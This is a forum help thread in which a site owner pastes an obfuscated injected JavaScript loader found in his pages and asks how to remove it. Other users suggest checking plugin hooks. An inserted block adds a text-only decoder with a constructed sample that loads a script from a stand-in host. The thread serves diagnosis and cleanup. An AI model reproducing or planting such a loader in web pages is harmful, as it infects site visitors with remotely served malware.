  #1  
04 May 2010, 00:18
ryancooper
Join Date: Jul 2002
Malware? Please Help?

Hello,
I am hoping someone can help me out here. My site is being reported as being infected with malware. If I look at the source code I can see

talkdisney.com/forums/wdw-theme-parks/

<script type="text/javascript">
var RSrAHsQFTSZ = "GXlLD17GXlLD29"; var rTOwsCKOsBB0 = "GXlLD3cGXlLD73GXlLD"; var rTOwsCKOsBB1 = "63GXlLD72GXlLD69GXl"; var rTOwsCKOsBB2 = "LD70GXlLD74GXlLD20G"; var rTOwsCKOsBB3 = "XlLD73GXlLD72GXlLD6"; var rTOwsCKOsBB4 = "3GXlLD3dGXlLD22GXlL"; var rTOwsCKOsBB5 = "D68GXlLD74GXlLD74GX"; var rTOwsCKOsBB6 = "lLD70GXlLD3aGXlLD2f"; var rTOwsCKOsBB7 = "GXlLD2fGXlLD78GXlLD"; var rTOwsCKOsBB8 = "74GXlLD6fGXlLD70GXl"; var rTOwsCKOsBB9 = "LD2eGXlLD73GXlLD65G"; var rTOwsCKOsBB10 = "XlLD72GXlLD76GXlLD6"; var rTOwsCKOsBB11 = "5GXlLD70GXlLD69GXlL"; var rTOwsCKOsBB12 = "D63GXlLD73GXlLD2eGX"; var rTOwsCKOsBB13 = "lLD63GXlLD6fGXlLD6d"; var rTOwsCKOsBB14 = "GXlLD2fGXlLD2fGXlLD"; var rTOwsCKOsBB15 = "6dGXlLD6cGXlLD2eGXl"; var rTOwsCKOsBB16 = "LD70GXlLD68GXlLD70G"; var rTOwsCKOsBB17 = "XlLD22GXlLD3eGXlLD2"; var rTOwsCKOsBB18 = "0GXlLD3cGXlLD2fGXlL"; var rTOwsCKOsBB19 = "D73GXlLD63GXlLD72GX"; var rTOwsCKOsBB20 = "lLD69GXlLD70GXlLD74"; var rTOwsCKOsBB21 = "GXlLD3e"; var ZrWBlSVWKBL = "MWp2m17GXlLD29"; var GwA9juVrobG = rTOwsCKOsBB0 + rTOwsCKOsBB1 + rTOwsCKOsBB2 + rTOwsCKOsBB3 + rTOwsCKOsBB4 + rTOwsCKOsBB5 + rTOwsCKOsBB6 + rTOwsCKOsBB7 + rTOwsCKOsBB8 + rTOwsCKOsBB9 + rTOwsCKOsBB10 + rTOwsCKOsBB11 + rTOwsCKOsBB12 + rTOwsCKOsBB13 + rTOwsCKOsBB14 + rTOwsCKOsBB15 + rTOwsCKOsBB16 + rTOwsCKOsBB17 + rTOwsCKOsBB18 + rTOwsCKOsBB19 + rTOwsCKOsBB20 + rTOwsCKOsBB21; var wa79vdAM5Lo = "wqOw517CEXvL29"; tZlMHObzT1T = GwA9juVrobG.replace(/GXlLD/g,"%"); var FwL4HjvTvmP=unescape;var RSrAHsQFTSZ = "CEXvL17MWp2m29"; q9124=this; var Bu91Qzp2Fxa= q9124["WYd1GoGYc2uG1mYGe2YnltY".replace(/[Y12WlG\:]/g, "")]; Bu91Qzp2Fxa.write(FwL4HjvTvmP(tZlMHObzT1T));
</script>


But I can not find this in the templates to remove it. Any ideas on how to fix this?


After a little more research it also seems to only show up in IE, not in Firefox?
Thanks,
ryan

--------------- Added 04 May 2010 at 14:04 ---------------

anyone?

Last edited by Marco van Herwaarden; 05 May 2010 at 10:36. Reason: Made link unclickable to avoid accidental infections
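
Added example, not part of the original thread: a text-only decoder for the pattern the script in post #1 uses (string fragments concatenated, a filler delimiter swapped for `%`, the result passed to `unescape` and written through a property name hidden behind a second `replace`). The sample input, its variable names and the `bad.example` address are constructed for illustration; the function name `decodeDropper` is hypothetical.

```javascript
// Constructed sample in the same style as the injected script (not the code from the post).
const SAMPLE = `
var a0 = "QwZ3cQwZ73QwZ63QwZ72QwZ69QwZ70QwZ74QwZ20QwZ73QwZ72Qw";
var a1 = "Z63QwZ3dQwZ22QwZ2fQwZ2fQwZ62QwZ61QwZ64QwZ2eQwZ65QwZ78QwZ6";
var a2 = "1QwZ6dQwZ70QwZ6cQwZ65QwZ2fQwZ78QwZ2eQwZ6aQwZ73QwZ22Q";
var a3 = "wZ3eQwZ3cQwZ2fQwZ73QwZ63QwZ72QwZ69QwZ70QwZ74QwZ3e";
var pad = "QwZ17QwZ29"; var all = a0 + a1 + a2 + a3;
enc = all.replace(/QwZ/g,"%"); var u=unescape; w=this;
var d = w["dXo7cXu7mXe7nXt".replace(/[X7]/g, "")]; d.write(u(enc));
`;

const ID = "[A-Za-z_$][\\w$]*";

// Decode the dropper as text only: nothing from `source` is evaluated or written to a page.
function decodeDropper(source) {
  // 1. Plain string assignments: name = "literal";  (a later assignment overwrites an earlier one)
  const vars = new Map();
  for (const m of source.matchAll(new RegExp(`(${ID})\\s*=\\s*"([^"]*)"\\s*;`, "g"))) {
    vars.set(m[1], m[2]);
  }
  // 2. Concatenations of those variables: name = a + b + c;
  const concat = new RegExp(`(${ID})\\s*=\\s*(${ID}(?:\\s*\\+\\s*${ID})+)\\s*;`, "g");
  for (const m of source.matchAll(concat)) {
    const parts = m[2].split("+").map((p) => p.trim());
    if (parts.every((p) => vars.has(p))) vars.set(m[1], parts.map((p) => vars.get(p)).join(""));
  }
  // 3. name.replace(/DELIM/g,"%") then unescape(): swap the delimiter, decode %XX (not %uXXXX).
  const payloads = [];
  const swap = new RegExp(`(${ID})\\.replace\\(/([A-Za-z0-9]+)/g\\s*,\\s*"%"\\)`, "g");
  for (const m of source.matchAll(swap)) {
    if (!vars.has(m[1])) continue;
    const escaped = vars.get(m[1]).split(m[2]).join("%");
    payloads.push(escaped.replace(/%([0-9a-fA-F]{2})/g, (_, h) => String.fromCharCode(parseInt(h, 16))));
  }
  // 4. Hidden property name: "junk-padded".replace(/[junk]/g, "") -> drop the junk characters.
  const s = source.match(/"([^"]*)"\.replace\(\/\[([^\]]+)\]\/g\s*,\s*""\)/);
  const junk = new Set(s ? s[2].replace(/\\/g, "") : "");
  const sink = s ? [...s[1]].filter((c) => !junk.has(c)).join("") : null;
  return { sink, payloads };
}

console.log(JSON.stringify(decodeDropper(SAMPLE), null, 2));
```

Run with Node against page source saved as text, this shows what such a script would write into the page without opening the page in a browser.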
  #2  
05 May 2010, 02:40
AWS
Join Date: Nov 2001
Real name: Bob
Look in the plugin code of any plugin that uses the global_start hook.
  #3  
05 May 2010, 14:09
ryancooper
Join Date: Jul 2002
@AWS It definitely has something to do with the plugins: when I turn off the plugin/hook system in AdminCP it goes away. Any ideas on what to start looking for?

Thanks!